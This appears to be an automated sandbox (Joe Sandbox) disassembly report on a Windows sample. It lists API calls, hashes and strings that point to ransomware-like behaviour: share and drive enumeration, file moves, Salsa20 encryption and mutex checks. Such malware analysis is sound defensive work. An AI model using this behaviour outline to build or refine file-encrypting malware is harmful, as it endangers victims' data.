                • Opcode ID: 474c6379b963d257ae86b00d206dade7857df39941341afbbe7ce7c2bd65e929
                • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                • Opcode Fuzzy Hash: 474c6379b963d257ae86b00d206dade7857df39941341afbbe7ce7c2bd65e929
                • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                APIs
                • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                • UpdateWindow.USER32(00000000), ref: 0041BAC5
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Window$CreateShowUpdate
                • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                • API String ID: 2944774295-3503800400
                • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                APIs
                • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00410C12
                • GlobalAlloc.KERNEL32(00000040,00004000), ref: 00410C39
                • _memset.LIBCMT ref: 00410C4C
                • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Enum$AllocGlobalOpenResource_memset
                • String ID:
                • API String ID: 364255426-0
                • Opcode ID: 54b312cc4ee8bd09624119d4c268e334e055f93c635bfd49589b22278edf9028
                • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                • Opcode Fuzzy Hash: 54b312cc4ee8bd09624119d4c268e334e055f93c635bfd49589b22278edf9028
                • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                APIs
                • GetLogicalDrives.KERNEL32 ref: 00410A75
                • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                • String ID:
                • API String ID: 2560635915-0
                • Opcode ID: 08bf204bd792d6dd79349f518f1c36b4d924f6273a23d8e3db056180a8ee52b3
                • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                • Opcode Fuzzy Hash: 08bf204bd792d6dd79349f518f1c36b4d924f6273a23d8e3db056180a8ee52b3
                • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                APIs
                • _malloc.LIBCMT ref: 00423B64
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00630000,00000000,00000001,00000000,00000000,00000000,?,00428CF4,00000000,00000000,00000000,00000000,?,00428BE1,00000018,00507BD0), ref: 00420CA5
                • std::exception::exception.LIBCMT ref: 00423B82
                • __CxxThrowException@8.LIBCMT ref: 00423B97
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F26B,?,?,00000000,?,?,?,?,0044F26B,?,005081FC,?), ref: 00430F1F
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                • String ID: bad allocation
                • API String ID: 3074076210-2104205924
                • Opcode ID: 4e2da3491f061beebdebaa5c3c629186ca5bd2094919368a719a5d4dfc9af30f
                • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                • Opcode Fuzzy Hash: 4e2da3491f061beebdebaa5c3c629186ca5bd2094919368a719a5d4dfc9af30f
                • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                APIs
                • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 0040F125
                • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: File$CloseCreateHandleWritelstrlen
                • String ID:
                • API String ID: 1421093161-0
                • Opcode ID: d37722a339e8ed15ccae530704db98a2c84ed12c53e28ca473a2ad4616829cbe
                • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                • Opcode Fuzzy Hash: d37722a339e8ed15ccae530704db98a2c84ed12c53e28ca473a2ad4616829cbe
                • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                APIs
                • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                  • Part of subcall function 004111C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0041120F
                  • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00411228
                  • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041123D
                  • Part of subcall function 004111C0: MoveFileW.KERNEL32(00000000,?), ref: 00411277
                  • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                  • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
                  • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                • TranslateMessage.USER32(?), ref: 0041B4CD
                • DispatchMessageW.USER32(?), ref: 0041B4D7
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                • String ID: %username%$I:\5d2860c89d774.jpg
                • API String ID: 441990211-897913220
                • Opcode ID: 5205ec39f4006fe15d4925df08c4ca0ce712fef9e244c20eb6c5ade0891e9626
                • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                • Opcode Fuzzy Hash: 5205ec39f4006fe15d4925df08c4ca0ce712fef9e244c20eb6c5ade0891e9626
                • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                APIs
                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                  • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                • _memset.LIBCMT ref: 00413C83
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                • String ID: vector<T> too long
                • API String ID: 1327501947-3788999226
                • Opcode ID: 18a6e95ac5c1231b3021f6a558c1153667619e94c9f198a37c01ca2d81c11676
                • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                • Opcode Fuzzy Hash: 18a6e95ac5c1231b3021f6a558c1153667619e94c9f198a37c01ca2d81c11676
                • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                APIs
                • _malloc.LIBCMT ref: 0040EF69
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00630000,00000000,00000001,00000000,00000000,00000000,?,00428CF4,00000000,00000000,00000000,00000000,?,00428BE1,00000018,00507BD0), ref: 00420CA5
                • _malloc.LIBCMT ref: 0040EF85
                • _memset.LIBCMT ref: 0040EF9B
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _malloc$AllocateHeap_memset
                • String ID:
                • API String ID: 3655941445-0
                • Opcode ID: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
                • Instruction ID: 5fa84ec4042e21db229fa26042ce02b7cce951e2f5e2b33d0654eda62efe4b83
                • Opcode Fuzzy Hash: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
                • Instruction Fuzzy Hash: 06110631600624EFCB10DF99D881A5ABBB5FF89314F2445A9E9489F396D731B912CBC1
                APIs
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                • String ID:
                • API String ID: 2799698630-0
                • Opcode ID: 709df60532502dc37342ef2d7862b4ed522cd428f287debc262a40a36955420a
                • Instruction ID: 5ab157793dcca273c0e587975c0a14bd2b460513ddb2d20d8000ed9fb441c990
                • Opcode Fuzzy Hash: 709df60532502dc37342ef2d7862b4ed522cd428f287debc262a40a36955420a
                • Instruction Fuzzy Hash: 30519D70D00219DAEF20DF60DD457DEBBB5BF15308F4040BAD40A66291EB7A9AC9CF5A
                APIs
                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                • __lock_file.LIBCMT ref: 00423A7D
                  • Part of subcall function 00420E53: __lock.LIBCMT ref: 00420E76
                • __fclose_nolock.LIBCMT ref: 00423A88
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                • String ID:
                • API String ID: 2800547568-0
                • Opcode ID: f0a3a0ce50a01bd69e50a122e6036715185cc1a341e54edb0f2d040e7ec5a48c
                • Instruction ID: e9f7363e2c125346a9344b83ccdc7017391740cbbddd1805e0fe7159b8e2b74d
                • Opcode Fuzzy Hash: f0a3a0ce50a01bd69e50a122e6036715185cc1a341e54edb0f2d040e7ec5a48c
                • Instruction Fuzzy Hash: 1EF0F631B01724AAD710AF66680275E6AB46F00339F90815FE4A09A1C1CB7C87428F59
                APIs
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004118DD
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 004118E9
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CloseFreeHandleVirtual
                • String ID:
                • API String ID: 2443081362-0
                • Opcode ID: 361c4fcee47f9886bce79b3ac72f802e467dd4b7b05589e3f2927c820f7a912b
                • Instruction ID: a75cf17640dcbe18a091e0aebb8a692561bc66dfcc2ddf1384dfcaf55dfbf141
                • Opcode Fuzzy Hash: 361c4fcee47f9886bce79b3ac72f802e467dd4b7b05589e3f2927c820f7a912b
                • Instruction Fuzzy Hash: D1E08636B415049BC7209B99ECC0B9DB374F785720F20437AD919733D047352D028A58
                APIs
                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004169DF
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                • String ID:
                • API String ID: 120817956-0
                • Opcode ID: a401f52fc995c05b336c7c18f0329bcfba5717e2edcc6a413f02a146fdcf07fe
                • Instruction ID: aa06b8048d3bf760f527e7d0bbb9ad0a08af858ba63749c6f8d7f01112261dfe
                • Opcode Fuzzy Hash: a401f52fc995c05b336c7c18f0329bcfba5717e2edcc6a413f02a146fdcf07fe
                • Instruction Fuzzy Hash: E731E3B2A006059BCB20DF68C5816AEB7F9EF45750F21823FE856D7740DB38DD448BA9
                APIs
                  • Part of subcall function 00413C40: _memset.LIBCMT ref: 00413C83
                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000008,-00000400,00000000,00000000,-00000400), ref: 004128AA
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide_memset
                • String ID:
                • API String ID: 2800726579-0
                • Opcode ID: 8313ae77d11bddeaaa3710ae7055e53778cf0dbc7179e063dea7dddb9b4e6e3a
                • Instruction ID: 77d5c0c78108e6bd7b696174a76f34ed3b4c8b07ae2fa23de187fb57fd92ed49
                • Opcode Fuzzy Hash: 8313ae77d11bddeaaa3710ae7055e53778cf0dbc7179e063dea7dddb9b4e6e3a
                • Instruction Fuzzy Hash: 9B11D371A00219BBDB11DF59CD41BDFBBA8EF01714F10422AF914A72C0C7BD99558BDA
                APIs
                • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 0041FA25
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: 0ac00649bc9f379a6b742ea92144ce4fa1e49017590e60b2748b6a8e655e84ce
                • Instruction ID: 74150d4eedde67828055b261a2b9f98274f0c47e32cd20f87c2cefabb50f2d8a
                • Opcode Fuzzy Hash: 0ac00649bc9f379a6b742ea92144ce4fa1e49017590e60b2748b6a8e655e84ce
                • Instruction Fuzzy Hash: F1D05E322883147BE3140A9AAC06F867AC88B15B20F00403AB609DA1C0D9A1A8108A9C
                APIs
                  • Part of subcall function 00410BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00410C12
                • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 0041FDA4
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: EnumMessageOpenSend
                • String ID:
                • API String ID: 1835186980-0
                • Opcode ID: 4b855248cb889363fe6aa4b9a8dd9f39f841337135063b4ce115baa5f3e43425
                • Instruction ID: f1b321f5059a27c682919cb5e20fd2d447803ac3e15b06371c74c2023cac73f2
                • Opcode Fuzzy Hash: 4b855248cb889363fe6aa4b9a8dd9f39f841337135063b4ce115baa5f3e43425
                • Instruction Fuzzy Hash: 27E02B311043406AD32097A4DC01F82BBC49F18728F00C81EF7CA6B9C1C5F1B04487ED
                APIs
                • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,00529230), ref: 0041FDD6
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: dcd01a2ceecdcc7afcdf07ee0c002b865cef6077f7601f89151651f24f0902f2
                • Instruction ID: 36d07be7825d0dd215c2e58fd0e5fada4a3bc662417c17551b787912ef620d2a
                • Opcode Fuzzy Hash: dcd01a2ceecdcc7afcdf07ee0c002b865cef6077f7601f89151651f24f0902f2
                • Instruction Fuzzy Hash: 6FD012753C9305B7E7180BA6BC47F593A989B29B00F504036F60DD92D0DAB1F4509A5C
                APIs
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __fsopen
                • String ID:
                • API String ID: 3646066109-0
                • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                • Instruction ID: 292279633ce522dfb3aa62ab9f23dea9a591004ce3b356b458beb681742a1975
                • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                • Instruction Fuzzy Hash: FDB0927254021C77CF012E82EC02A493B199B60764F448021FB1C181B1E6BBE66496C9
                APIs
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __wfsopen
                • String ID:
                • API String ID: 197181222-0
                • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                • Instruction ID: 060863096896a5b816ca94ba1531ddaea04f54b188c1fa908ac11e743c0bd32b
                • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                • Instruction Fuzzy Hash: 1EB0927254020C77CE012A82EC02A497B199B516A4F408021FB0C18571A677A6A09A89
                APIs
                • _wcscmp.LIBCMT ref: 004382B9
                • _wcscmp.LIBCMT ref: 004382CA
                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: InfoLocale_wcscmp
                • String ID: ACP$OCP
                • API String ID: 1351282208-711371036
                • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                APIs
                Strings
                • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                • input != nullptr && output != nullptr, xrefs: 0040C095
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __wassert
                • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                • API String ID: 3993402318-1975116136
                • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                APIs
                • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                • GetLastError.KERNEL32 ref: 00412509
                • CloseHandle.KERNEL32 ref: 0041251C
                • CloseHandle.KERNEL32 ref: 00412539
                • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                • GetLastError.KERNEL32 ref: 0041255B
